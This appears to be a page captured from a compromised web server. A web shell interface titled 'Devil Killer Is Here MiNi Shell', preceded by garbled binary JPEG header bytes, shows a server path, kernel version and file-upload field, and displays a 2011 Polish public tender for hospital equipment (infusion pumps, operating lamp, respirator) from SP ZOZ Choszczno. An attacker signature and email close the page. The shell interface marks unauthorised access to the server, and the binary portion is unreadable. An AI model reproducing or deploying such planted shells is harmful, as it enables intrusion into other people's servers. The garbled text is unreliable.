JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110413/114449-N-2011.html

<p class="kh_header"><b>Choszczno: DOSTAWA POMP INFUZYJNYCH, LAMPY BEZCIENIOWEJ, WÓZKA DO PRZEWOŻENIA CHORYCH, RESPIRATORA STACJONARNEGO
DLA
 SP ZOZ W CHOSZCZNIE</b><br>
<b>Numer ogłoszenia: 114449 - 2011; data zamieszczenia: 13.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Niedziałkowskiego 4a, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7652438, 7657211 w 143, faks 095 7652410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.spzozchoszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA POMP INFUZYJNYCH, LAMPY BEZCIENIOWEJ, WÓZKA DO PRZEWOŻENIA CHORYCH, RESPIRATORA STACJONARNEGO
DLA
 SP ZOZ W CHOSZCZNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa pomp infuzyjnych, lampy bezcieniowej, wózka do przewożenia chorych, respiratora stacjonarnego, defibrylatorów szczegółowo określonych w załączniku nr 6 do specyfikacji istotnych warunków zamówienia umieszczonych na stronie internetowej Zamawiającego wraz z pozostałymi dokumentami przetargowymi. Zamawiający dopuszcza składania ofert częściowych. Zamówienie podzielone jest na 5 pakietów. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.10-0, 44.61.12.00-8, 33.19.20.00-2, 33.16.70.00-8, 33.19.51.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Pzp, zgodnie z art. 44 ustawy. ( zał. nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (zał. nr 1 do SIWZ);
Formularz asortymentowo-cenowy (zał. nr 2 do SIWZ);
Zatwierdzony projekt umowy wraz z warunkami gwarancyjnymi (załącznik nr 4 do SIWZ)
Oświadczenie o atestach stanowiące załącznik nr 5 do SIWZ. 
Potwierdzone warunki graniczne zgodnie z załącznikiem nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzozchoszczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej.  73-200 Choszczno  ulica Niedziałkowskiego 4A  Pokój nr 306.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej.  73-200 Choszczno  ulica Niedziałkowskiego 4A  Pokój nr 305 (sekretariat Dyrektora)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pompy infuzyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pompa przeznaczona jest do wykonywania wlewów dożylnych
Pompa przystosowana jest do podłączenia strzykawek produkcji polskiej o pojemności: BD 20 ml (trzyczęściowa) i Janpol, 50, 60 ml
możliwość założenia  dwóch strzykawek o pojemności 50, 60 ml lub dwóch o poje. 20 ml lub też dwie o różnych pojemnościach
Po założeniu strzykawki pompa automatycznie odczytuje jej pojemność
Informacja o typie zastosowanej strzykawki wyświetlana jest na świetlnym wskaźniku wielkości zainstalowanej strzykawki niezależnie dla każdego toru
Alarm okluzji pojawia się powyżej 700 mm Hg.
Ciśnienie okluzji stałe, niezależne od typu zastosowanej strzykawki
Zakres ustawiania szybkości infuzji wynosi od 0,1 do 99,9 mlh ze skokiem 0,1 mlh
Możliwość kasowania licznika objętości infuzji bez przerywania infuzji
Dawka podawana jest z prędkością 256 mlh
Wartość zrealizowanej objętości dawki wyświetlana jest na numerycznym  wskaźniku głównym
Funkcja KVO sygnalizowana jest alarmem i pojawia się gdy do całkowitego opróżnienia strzykawki pozostało ok. 1 ml
możliwość czasowego wstrzymania infuzji
W chwili braku zasilania zewnętrznego pompa nie zmienia parametrów pracy gdyż automatycznie przechodzi na zasilanie akumulatorowe
SYGNALIZACJA DŹWIĘKOWA I WIZUALNA:
1.	Koniec infuzji 
2.	Prawie pusta strzykawka - automatyczne uruchomienie funkcji KVO 
3.	Okluzja - przekroczenie ustalonego ciśnienia pompującego, ciśnienie powyżej 700 mm Hg.
4.	Słabe baterie 
SYGNALIZACJA ŚWIETLNA:
1.	Zanik zasilania sieciowego 
2.	Brak strzykawki 
3.	Wewnętrzne uszkodzenie pompy 
WSKAŹNIKI:
1.	szybkość dozowania wskazywana na numerycznym wskaźniku głównym,
2.	objętość podana, wyświetlana na wskaźniku głównym poprzez uaktywnienie przycisku ml  , pracy pompy (dozowania),
3.	wstrzymania infuzji,
4.	podłączenia pompy do sieci,
5.	praca z baterii
PARAMETRY TECHNICZNE:
1.	szybkość dozowania- od 0,1 do 99,9 mlh
2.	skok szybkości dozowania - 0,1 mlh
3.	szybkość dozowania dawki uderzeniowej -256 mlh
4.	dokładność szybkości dozowania - +- 3% objętości przetoczonej
5.	ciśnienie okluzji - 700 mm Hg
6.	typy stosowanych strzykawek- BD - 20 ml, Janpol - 50, 60 ml, 
7.	zasilanie:- zewnętrzne - sieciowe , wewnętrzne - akumulatorowe
8.	w pełni naładowany akumulator pracuje min. 4 godz. przy pracy dwóch torów infuzyjnych z maksymalną wydajnością
9.	zakres temperatury pracy+ 10 do + 50 C
10.	stopień odporności na zalanie płynami infuzyjnymi 	- kroploszczelna
11.	wymiary maksymalne - 140 x 260 x 250 mm
Przeglądy w okresie gwarancji wraz z dojazdem serwisu wliczone w cenę oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WÓZEK DO TRANSPORTU CHORYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szerokość całkowita 740 mm (+- 30 mm)
Długość całkowita: 2050 mm(+- 30 mm) 
Wysokość leża od podłogi regulowana za pomocą siłownika hydraulicznego 600 mm do 900 mm
Konstrukcja stołu wykonana z profili stalowych pokrytych lakierem proszkowym
Regulacja oparcia pleców za pomocą sprężyny gazowej min. 600
Przechył  Trendelenburga min. 200
Przechył anty - Trendelenburga min.120
Pozycja Trendelenburga i anty - Trendelenburga wspomagana sprężynami gazowymi
Leże wypełnione płytą laminowaną umożliwiającą monitorowanie pacjenta, wykonanie zdjęć RTG na całej długości wózka, oraz przeprowadzenie reanimacji.
Dopuszczalne obciążenie wózka min.250 kg
Cztery koła jezdne wyposażone w centralną blokadę oraz blokadę kierunkową
Wyposażenie standard:
  - dwie barierki boczne chromowane
  - wieszak kroplówki - 1 szt.
-	materac - 1 szt.
-	kosz na ubrania pacjenta- 1 szt.
Świadectwa, certyfikaty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> LAMPA OPERACYJNA POJEDYNCZA 3 ŻARÓWKOWA  STATYWOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampa operacyjna statywowa z zasilaniem sieciowo akumulatorowym  
Wysokość lampy regulowana w zakresie 1500- 2300mm  +- 50 mm  
Zasada oświetlenia:
jedna głowica oświetleniowa zapewniająca bezcieniowe oświetlenie pola operacyjnego 
Kopuła  3 - żarówkowa
Kopuła: na zakończeniu ramienia poprzecznego zamocowane (obrotowo o n x 360°) ramię uchylne prostowodowe zakończone przegubami obrotowymi dającymi swobodę manewrowania kopułą w osi X,Y,Z o n x 360°
Natężenie oświetlenia lampy Ec   120 000 lux
Średnica plamy świetlnej d10  16 cm 
Średnica plamy świetlnej d50   10 cm
Płynna regulacja wielkości plamy świetlnej sterylizowanym uchwytem ze środka lampy
Regulacja natężenia oświetlenia
 w zakresie 50-100%
Współczynnik odwzorowania barw Ra    94
Temperatura barwowa   4200 [K]
Przedział roboczy bez konieczności ogniskowania 
70-140 [cm] 
Maksymalne natężenie napromienienia lampy dla 100 tys. lux nie większe niż 390 Wm2
Żarówka halogenowa 24V, 75W o żywotności minimum  2000 godzin
Atesty certyfikaty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RESPIRATOR STACJONARNO-TRANSPORTOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Respirator transportowo - stacjonarny dla dzieci i dorosłych o wadze maks. 10 kg
Zasilanie gazowe w tlen z centralnej instalacji.
Aluminiowa butla tlenowa 2 lub 2,7 litra z reduktorem i szybkim złączem do przewodu zasilania w tlen - typ AGA
Możliwość zasilania w tlen ze źródła niskociśnieniowego np. koncentratora tlenu
Własne zasilanie w sprężone powietrze
Zasilanie AC 230V, 50Hz
Zasilanie DC 12 V
Awaryjne zasilanie respiratora z akumulatora wewnętrznego min 60 min
Kompletny układ oddechowy wielorazowy  - 2 szt. 
Wentylacja kontrolowana objętością VCV w trybie CMV i SIMV
Wentylacja kontrolowana ciśnieniem PCV w trybie CMV i SIMV
PEEP CPAP
Wspomaganie oddechu spontanicznego ciśnieniem PSV
Wdech manualny
Wentylacja awaryjna przy bezdechu
Częstość oddechów
Objętość pojedynczego oddechu
Regulowany czas wdechu
Stężenie tlenu w mieszaninie oddechowej regulowane płynnie w zakresie 21 - 100%
Ciśnienie wdechowe PCV 
PEEP CPAP
Przepływowy tryb rozpoznawania oddechu własnego pacjenta 
Wbudowany kolorowy monitor obrazowania parametrów wentylacji, przekątna minimum 8 cali
Całkowita częstość oddychania
Wydechowa objętość pojedynczego oddechu
Wydechowa objętość całkowitej wentylacji minutowej
Ciśnienie szczytowe
Graficzna prezentacja w czasie rzeczywistym krzywych dynamicznych:
Ciśnienie czas
Przepływ  czas
Ciśnienie  objętość
Alarmy
Całkowitej objętości minutowej (wysokiej i niskiej)
Niskiej objętości oddechowej pojedynczego oddechu
Wysokiego ciśnienia w układzie pacjenta
Niskiego ciśnienia w układzie pacjenta
Wysokiej i niskiej częstości oddechowej
Bezdechu
Inne
Podstawa jezdna do respiratora - sposób mocowania umożliwiający łatwe zdjęcie urządzenia bez użycia narzędzi
Ramię do rur
Instrukcja obsługi w języku polskim (z dostawą).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.12.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MODUŁ KAPNOGRAFII Z ANALIZĄ GAZÓW ANESTETYCZNYCH, KOMPATYBILNY Z MONITOREM BENEVIEW T5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pomiar EtCO2 i InsCO2
Monitorowane gazy anestetyczne, z automatyczną identyfikacją: halotan, izofluran, enfluran, sewofluran, dezfluran
Jednoczesne wyświetlanie krzywej kapnograficznej oraz wartości stężeń gazu anestetycznego 
Obliczanie i wyświetlanie wartości MAC
Pomiar stężenia tlenu (czujnik paramagnetyczny)
W wyposażeniu minimum 20 linii pomiarowych i 10 pułapek wodnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com